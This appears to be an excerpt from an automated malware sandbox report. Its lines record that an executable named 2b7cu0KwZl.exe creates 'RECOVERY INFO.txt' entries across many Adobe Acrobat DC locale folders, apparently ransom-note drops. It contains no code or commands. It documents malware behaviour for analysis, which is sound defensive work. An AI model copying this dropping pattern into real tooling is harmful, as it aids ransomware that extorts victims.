Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txt	Jump to behavior
